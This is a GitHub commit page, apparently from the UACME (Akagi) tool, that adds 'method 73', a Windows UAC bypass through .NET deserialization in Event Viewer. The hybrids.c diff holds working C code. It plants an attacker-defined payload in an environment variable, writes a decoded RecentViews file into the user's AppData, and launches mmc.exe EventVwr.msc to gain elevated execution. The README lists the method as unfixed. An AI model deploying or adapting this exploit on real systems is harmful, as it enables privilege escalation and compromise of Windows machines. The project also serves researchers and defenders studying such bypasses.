Skip to content

Commit

Permalink
v 3.6.0
Browse files Browse the repository at this point in the history
Method 73 added, see #127  for more info;
Readme updated.
  • Loading branch information
hfiref0x committed Apr 29, 2022
1 parent c88d8d3 commit 06d4865
Show file tree
Hide file tree
Showing 18 changed files with 1,180 additions and 100 deletions.
11 changes: 11 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -743,6 +743,16 @@ First parameter is number of method to use, second is optional command (executab
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.9
73. Author: orange_8361 and antonioCoco
* Type: Shell API
* Method: .NET deserialization
* Target(s): \system32\mmc.exe EventVwr.msc
* Component(s): Attacker defined
* Implementation: ucmDotNetSerialMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.0

</details>

Expand Down Expand Up @@ -850,6 +860,7 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
* UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
* Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses
* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
* UAC bypass through .Net Deserialization vulnerability in eventvwr.exe, https://twitter.com/orange_8361/status/1518970259868626944

# Authors

Expand Down
Binary file modified Source/Akagi/Resource.rc
Binary file not shown.
644 changes: 641 additions & 3 deletions Source/Akagi/encresource.h

Large diffs are not rendered by default.

4 changes: 2 additions & 2 deletions Source/Akagi/global.h
Original file line number Diff line number Diff line change
Expand Up @@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
* VERSION: 3.59
* VERSION: 3.60
*
* DATE: 04 Feb 2022
* DATE: 27 Apr 2022
*
* Common header file for the program support routines.
*
Expand Down
87 changes: 85 additions & 2 deletions Source/Akagi/methods/hybrids.c
Original file line number Diff line number Diff line change
Expand Up @@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
* VERSION: 3.59
* VERSION: 3.60
*
* DATE: 02 Feb 2022
* DATE: 27 Apr 2022
*
* Hybrid UAC bypass methods.
*
Expand Down Expand Up @@ -1138,3 +1138,86 @@ NTSTATUS ucmMsdtMethod(

return MethodResult;
}

/*
* ucmDotNetSerialMethod
*
* Purpose:
*
* Bypass UAC using DotNet Deserialization for eventvwr.
*
*/
NTSTATUS ucmDotNetSerialMethod(
_In_ LPWSTR lpszPayload
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HANDLE hProcess = NULL;
PVOID dataBuffer;
DWORD dataSize;
LPWSTR lpAppData = NULL, lpTargetPath = NULL;
SIZE_T memIO;
WCHAR szTarget[MAX_PATH * 2];

do {

//
// Set payload as environment variable.
//
supSetEnvVariable(FALSE, NULL, MYSTERIOUSCUTETHING, lpszPayload);

//
// Drop RecentViews cache element to %AppData%.
//
if (FAILED(SHGetKnownFolderPath(&FOLDERID_LocalAppData, 0, NULL, &lpAppData)))
break;

memIO = (MAX_PATH + _strlen(lpAppData)) * sizeof(WCHAR);
lpTargetPath = (LPWSTR)supHeapAlloc(memIO);
if (lpTargetPath == NULL)
break;

_strcpy(lpTargetPath, lpAppData);
_strcat(lpTargetPath, TEXT("\\Microsoft\\Event Viewer\\RecentViews"));

if (g_ctx->dwBuildNumber < NT_WIN8_RTM) {
dataBuffer = (PVOID)g_encodedRecentViewsV2;
dataSize = sizeof(g_encodedRecentViewsV2);
}
else {
dataBuffer = (PVOID)g_encodedRecentViews;
dataSize = sizeof(g_encodedRecentViews);
}

if (!supDecodeAndWriteBufferToFile(lpTargetPath,
(CONST PVOID)dataBuffer,
dataSize,
'zzzz'))
{
break;
}

//
// Run eventvwr.exe as final trigger.
//
_strcpy(szTarget, g_ctx->szSystemDirectory);
_strcat(szTarget, MMC_EXE);
hProcess = supRunProcess3(szTarget, EVENTVWR_MSC, NULL, SW_SHOW);
if (hProcess) {
supWaitForChildProcesses(MMC_EXE, 50 * 1000);
CloseHandle(hProcess);
MethodResult = STATUS_SUCCESS;
}

} while (FALSE);

if (lpAppData) CoTaskMemFree(lpAppData);
if (lpTargetPath) {
DeleteFile(lpTargetPath);
supHeapFree(lpTargetPath);
}

supSetEnvVariable(TRUE, NULL, MYSTERIOUSCUTETHING, NULL);

return MethodResult;
}
7 changes: 5 additions & 2 deletions Source/Akagi/methods/hybrids.h
Original file line number Diff line number Diff line change
Expand Up @@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.H
*
* VERSION: 3.59
* VERSION: 3.60
*
* DATE: 02 Feb 2022
* DATE: 27 Apr 2022
*
* Prototypes and definitions for hybrid methods.
*
Expand Down Expand Up @@ -57,6 +57,9 @@ NTSTATUS ucmMsdtMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);

NTSTATUS ucmDotNetSerialMethod(
_In_ LPWSTR lpszPayload);

//
// Post execution cleanup routines.
//
Expand Down
22 changes: 19 additions & 3 deletions Source/Akagi/methods/methods.c
Original file line number Diff line number Diff line change
Expand Up @@ -4,9 +4,9 @@
*
* TITLE: METHODS.C
*
* VERSION: 3.59
* VERSION: 3.60
*
* DATE: 04 Feb 2022
* DATE: 27 Apr 2022
*
* UAC bypass dispatch.
*
Expand Down Expand Up @@ -46,6 +46,7 @@ UCM_API(MethodProtocolHijack);
UCM_API(MethodPca);
UCM_API(MethodCurVer);
UCM_API(MethodMsdt);
UCM_API(MethodDotNetSerial);

ULONG UCM_WIN32_NOT_IMPLEMENTED[] = {
UacMethodWow64Logger,
Expand Down Expand Up @@ -133,7 +134,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE }
{ MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },
{ MethodDotNetSerial, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }
};

/*
Expand Down Expand Up @@ -755,3 +757,17 @@ UCM_API(MethodMsdt)
Parameter->PayloadCode,
Parameter->PayloadSize);
}

UCM_API(MethodDotNetSerial)
{
LPWSTR lpszPayload = NULL;

UNREFERENCED_PARAMETER(Parameter);

if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;

return ucmDotNetSerialMethod(lpszPayload);
}
5 changes: 3 additions & 2 deletions Source/Akagi/methods/methods.h
Original file line number Diff line number Diff line change
Expand Up @@ -4,9 +4,9 @@
*
* TITLE: METHODS.H
*
* VERSION: 3.59
* VERSION: 3.60
*
* DATE: 04 Feb 2022
* DATE: 27 Apr 2022
*
* Prototypes and definitions for UAC bypass methods table.
*
Expand Down Expand Up @@ -92,6 +92,7 @@ typedef enum _UCM_METHOD {
UacMethodCurVer, //+
UacMethodNICPoison2, //+
UacMethodMsdt, //+
UacMethodDotNetSerial, //+
UacMethodMax,
UacMethodInvalid = 0xabcdef
} UCM_METHOD;
Expand Down
Loading

0 comments on commit 06d4865

Please sign in to comment.